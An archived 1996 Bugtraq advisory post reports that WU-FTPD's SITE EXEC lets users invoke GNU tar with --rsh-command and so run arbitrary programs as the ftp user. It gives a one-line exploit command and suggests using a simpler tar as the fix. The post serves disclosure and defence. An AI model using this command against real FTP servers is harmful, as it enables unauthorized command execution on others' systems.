[3214] in bugtraq


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

WU.FTPD vulnerability: gnu tar possibly others

daemon@ATHENA.MIT.EDU (Alan Cox)
Mon Aug 19 14:52:26 1996

Date: 	Mon, 19 Aug 1996 14:09:19 +0100
Reply-To: Bugtraq List <BUGTRAQ@netspace.org>
From: Alan Cox <coxa@cableol.net>
To: Multiple recipients of list BUGTRAQ <BUGTRAQ@netspace.org>

quote site exec tar  -c -v --rsh-command=commandtorunasftp -f somebox:foo foo

Gnu tar allows you to specify which binary you wish to run.

Fix:
        Use a dumber tar. Also carefully evaluate any other binaries
you have to avoid unpleasant and similar suprises.


home	help	back	first	fref	pref	prev	next	nref	lref	last	post

[3214] in bugtraq

WU.FTPD vulnerability: gnu tar possibly others

daemon@ATHENA.MIT.EDU (Alan Cox)Mon Aug 19 14:52:26 1996

daemon@ATHENA.MIT.EDU (Alan Cox)
Mon Aug 19 14:52:26 1996